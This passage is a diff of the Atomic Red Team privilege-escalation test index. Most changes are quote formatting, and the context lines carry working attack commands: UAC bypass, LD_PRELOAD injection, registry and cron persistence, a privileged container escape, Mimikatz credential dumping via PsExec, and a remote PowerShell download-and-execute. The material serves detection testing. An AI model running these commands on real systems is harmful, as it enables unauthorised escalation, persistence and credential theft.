@@ -12055,7 +12055,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12066,7 +12066,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12091,7 +12091,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12102,7 +12102,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12216,7 +12216,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -12261,7 +12261,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" 
@@ -12299,7 +12299,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -12416,10 +12416,10 @@ privilege-escalation: executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} - ' +' cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} - ' +' name: command_prompt elevation_required: true T1078.004: @@ -12485,7 +12485,7 @@ privilege-escalation: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. - ' +' supported_platforms: - google-workspace - windows @@ -12520,20 +12520,20 @@ privilege-escalation: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet - ' +' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud - ' +' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" - ' +' T1546.015: technique: external_references: @@ -12675,7 +12675,7 @@ privilege-escalation: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -12686,17 +12686,17 @@ privilege-escalation: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl get cronjobs -n #{namespace} - ' +' name: bash elevation_required: false - name: CreateCronjob 
@@ -12708,7 +12708,7 @@ privilege-escalation: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -12719,20 +12719,20 @@ privilege-escalation: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} - ' +' cleanup_command: 'kubectl delete cronjob art -n #{namespace} - ' +' name: bash elevation_required: false T1134.002: @@ -12932,7 +12932,7 @@ privilege-escalation: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. - ' +' supported_platforms: - macos - linux @@ -12952,7 +12952,7 @@ privilege-escalation: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil - ' +' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -12960,7 +12960,7 @@ privilege-escalation: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - macos - linux @@ -12992,7 +12992,7 @@ privilege-escalation: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -13009,10 +13009,10 @@ privilege-escalation: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} - ' +' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} - ' +' T1574.001: technique: id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 
@@ -13187,10 +13187,10 @@ privilege-escalation: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) - ' +' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -13198,7 +13198,7 @@ privilege-escalation: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 - ' +' name: command_prompt T1078.001: technique: @@ -13318,7 +13318,7 @@ privilege-escalation: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default - ' +' supported_platforms: - windows input_arguments: @@ -13329,10 +13329,10 @@ privilege-escalation: executor: command: 'net user #{guest_user} /active:yes - ' +' cleanup_command: 'net user #{guest_user} /active:no - ' +' name: command_prompt elevation_required: true T1078.002: @@ -13588,13 +13588,13 @@ privilege-escalation: Provider to be federated must be configured (outside of the scope of this test). - ' +' prereq_command: 'if (Get-Module AzureADPreview) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureADPreview -Force - ' +' executor: command: | Import-Module AzureADPreview 
@@ -13856,21 +13856,21 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' - ' +' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload - ' +' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -13895,18 +13895,18 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls - ' +' name: bash T1055.001: technique: @@ -14006,10 +14006,10 @@ privilege-escalation: dependencies: - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" @@ -14155,7 +14155,7 @@ privilege-escalation: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 - ' +' supported_platforms: - macos input_arguments: 
@@ -14253,24 +14253,24 @@ privilege-escalation: - description: Verify docker is installed. prereq_command: 'which docker - ' +' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi - ' +' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker - ' +' get_prereq_command: 'sudo systemctl start docker - ' +' - description: Verify kind is in the path. prereq_command: 'which kind - ' +' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind @@ -14278,14 +14278,14 @@ privilege-escalation: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters - ' +' get_prereq_command: 'sudo kind create cluster --name atomic-cluster - ' +' - description: Verify kubectl is in path prereq_command: 'which kubectl - ' +' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl @@ -14296,11 +14296,11 @@ privilege-escalation: true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'' - ' +' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod - ' +' T1546: technique: id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db @@ -14844,7 +14844,7 @@ privilege-escalation: auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: 
@@ -14860,19 +14860,19 @@ privilege-escalation: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" - ' +' cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: IFEO Global Flags auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -15008,7 +15008,7 @@ privilege-escalation: description: 'This test uses the insmod command to load a kernel module for Linux. - ' +' supported_platforms: - linux input_arguments: @@ -15032,10 +15032,10 @@ privilege-escalation: dependencies: - description: 'The kernel module must exist on disk at specified location - ' +' prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{module_source_path}/* #{temp_folder}/ @@ -15044,7 +15044,7 @@ privilege-escalation: executor: command: 'sudo insmod #{module_path} - ' +' cleanup_command: | sudo rmmod #{module_name} [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} @@ -15250,7 +15250,7 @@ privilege-escalation: auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 description: 'Create a plist and execute it - ' +' supported_platforms: - macos input_arguments: @@ -15267,15 +15267,15 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) - ' +' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; exit 1; - ' +' executor: name: bash elevation_required: true 
@@ -15369,7 +15369,7 @@ privilege-escalation: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: 'Utilize LaunchDaemon to launch `Hello World` - ' +' supported_platforms: - macos input_arguments: @@ -15386,15 +15386,15 @@ privilege-escalation: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) - ' +' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and try again."; exit 1; - ' +' executor: name: bash elevation_required: true @@ -15614,7 +15614,7 @@ privilege-escalation: auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 description: 'Mac logon script - ' +' supported_platforms: - macos executor: @@ -15812,7 +15812,7 @@ privilege-escalation: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files - ' +' supported_platforms: - windows input_arguments: @@ -15823,7 +15823,7 @@ privilege-escalation: executor: command: 'netsh.exe add helper #{helper_file} - ' +' name: command_prompt T1037.003: technique: @@ -15985,10 +15985,10 @@ privilege-escalation: dependencies: - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) - ' +' prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" @@ -16029,7 +16029,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}'' -ParentId #{parent_pid}' 
@@ -16058,7 +16058,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}' @@ -16088,7 +16088,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | @@ -16124,7 +16124,7 @@ privilege-escalation: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}''' @@ -16534,7 +16534,7 @@ privilege-escalation: auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 description: 'Modify MacOS plist file in one of two directories - ' +' supported_platforms: - macos executor: @@ -16635,11 +16635,11 @@ privilege-escalation: command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ - ' +' cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1055.002: @@ -16787,7 +16787,7 @@ privilege-escalation: profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. - ' +' supported_platforms: - windows input_arguments: @@ -16803,13 +16803,13 @@ privilege-escalation: dependencies: - description: 'Ensure a powershell profile exists for the current user - ' +' prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force - ' +' executor: command: | Add-Content #{ps_profile} -Value "" 
@@ -17156,13 +17156,13 @@ privilege-escalation: cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore - ' +' name: powershell - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process - ' +' supported_platforms: - windows input_arguments: @@ -17174,7 +17174,7 @@ privilege-escalation: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -17185,7 +17185,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -17308,7 +17308,7 @@ privilege-escalation: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed - ' +' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -17319,7 +17319,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -17354,7 +17354,7 @@ privilege-escalation: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} 
@@ -17369,10 +17369,10 @@ privilege-escalation: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) - ' +' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" @@ -17383,7 +17383,7 @@ privilege-escalation: command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" - ' +' name: command_prompt elevation_required: false T1055.008: @@ -17560,14 +17560,14 @@ privilege-escalation: command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common - ' +' elevation_required: true name: bash - name: rc.common auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a description: 'Modify rc.common - ' +' supported_platforms: - linux executor: @@ -17583,12 +17583,12 @@ privilege-escalation: ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi - ' +' - name: rc.local auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 description: 'Modify rc.local - ' +' supported_platforms: - linux executor: @@ -17604,7 +17604,7 @@ privilege-escalation: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi - ' +' T1547.007: technique: created: '2020-01-24T18:15:06.641Z' @@ -17686,10 +17686,10 @@ privilege-escalation: executor: command: 'sudo defaults write com.apple.loginwindow LoginHook #{script} - ' +' cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook - ' +' elevation_required: true name: sh T1547.001: 
@@ -17815,11 +17815,11 @@ privilege-escalation: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" - ' +' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 - ' +' name: command_prompt - name: Reg Key RunOnce auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb @@ -17837,11 +17837,11 @@ privilege-escalation: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" - ' +' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: PowerShell Registry RunOnce @@ -17867,7 +17867,7 @@ privilege-escalation: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Suspicious vbs file run from startup Folder @@ -18108,7 +18108,7 @@ privilege-escalation: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. - ' +' supported_platforms: - windows input_arguments: @@ -18125,10 +18125,10 @@ privilege-escalation: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 - ' +' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -18164,11 +18164,11 @@ privilege-escalation: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 - ' +' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | 
@@ -18190,7 +18190,7 @@ privilege-escalation: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 - ' +' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -18207,7 +18207,7 @@ privilege-escalation: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -18218,7 +18218,7 @@ privilege-escalation: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -18231,7 +18231,7 @@ privilege-escalation: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. - ' +' supported_platforms: - windows executor: @@ -18243,7 +18243,7 @@ privilege-escalation: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 - ' +' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -18379,7 +18379,7 @@ privilege-escalation: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. - ' +' supported_platforms: - windows input_arguments: @@ -18636,7 +18636,7 @@ privilege-escalation: description: 'Change Service registry ImagePath of a bengin service to a malicious file - ' +' supported_platforms: - windows input_arguments: 
@@ -18656,22 +18656,22 @@ privilege-escalation: dependencies: - description: 'The service must exist (#{weak_service_name}) - ' +' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" - ' +' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" - ' +' cleanup_command: 'sc.exe delete #{weak_service_name} - ' +' name: command_prompt T1548.001: technique: @@ -18727,7 +18727,7 @@ privilege-escalation: description: 'Make, change owner, and change file attributes on a C source code file - ' +' supported_platforms: - macos - linux @@ -18753,7 +18753,7 @@ privilege-escalation: auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -18769,14 +18769,14 @@ privilege-escalation: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' name: sh elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -18792,7 +18792,7 @@ privilege-escalation: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' name: sh elevation_required: true - name: Make and modify capabilities of a binary @@ -18824,7 +18824,7 @@ privilege-escalation: description: 'This test gives a file the capability to set UID without using flags. - ' +' supported_platforms: - linux input_arguments: @@ -18838,7 +18838,7 @@ privilege-escalation: sudo setcap cap_setuid=ep #{file_to_setcap} cleanup_command: 'rm #{file_to_setcap} - ' +' name: sh elevation_required: true T1547.009: 
@@ -18912,7 +18912,7 @@ privilege-escalation: #{shortcut_file_path} cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 - ' +' name: command_prompt - name: Create shortcut to cmd in startup folders auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 @@ -19013,10 +19013,10 @@ privilege-escalation: executor: command: 'sudo touch /Library/StartupItems/EvilStartup.plist - ' +' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist - ' +' name: sh elevation_required: true T1548.003: @@ -19084,7 +19084,7 @@ privilege-escalation: auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e description: 'Common Sudo enumeration methods. - ' +' supported_platforms: - macos - linux @@ -19098,7 +19098,7 @@ privilege-escalation: This is dangerous to modify without using ''visudo'', do not do this on a production system. - ' +' supported_platforms: - macos - linux @@ -19113,7 +19113,7 @@ privilege-escalation: description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using ''visudo'', do not do this on a production system. - ' +' supported_platforms: - macos - linux @@ -19219,7 +19219,7 @@ privilege-escalation: description: 'This test creates a Systemd service unit file and enables it as a service. - ' +' supported_platforms: - linux input_arguments: @@ -19292,15 +19292,15 @@ privilege-escalation: dependencies: - description: 'System must be Ubuntu ,Kali OR CentOS. - ' +' prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; - ' +' get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. - ' +' executor: name: bash elevation_required: true 
@@ -19452,20 +19452,20 @@ privilege-escalation: dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -19482,20 +19482,20 @@ privilege-escalation: dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer @@ -19967,7 +19967,7 @@ privilege-escalation: auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f description: 'Adds a command to the .bash_profile file of the current user - ' +' supported_platforms: - macos - linux @@ -19979,13 +19979,13 @@ privilege-escalation: executor: command: 'echo "#{command_to_add}" >> ~/.bash_profile - ' +' name: sh - name: Add command to .bashrc auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f description: 'Adds a command to the .bashrc file of the current user - ' +' supported_platforms: - macos - linux @@ -19997,7 +19997,7 @@ privilege-escalation: executor: command: 'echo "#{command_to_add}" >> ~/.bashrc - ' +' name: sh T1055.014: technique: 
@@ -20432,10 +20432,10 @@ privilege-escalation: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) - ' +' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -20468,10 +20468,10 @@ privilege-escalation: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) - ' +' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -20567,11 +20567,11 @@ privilege-escalation: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore - ' +' name: powershell - name: Winlogon Userinit Key Persistence - PowerShell auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb @@ -20590,11 +20590,11 @@ privilege-escalation: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore - ' +' name: powershell - name: Winlogon Notify Key Logon Persistence - PowerShell auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 
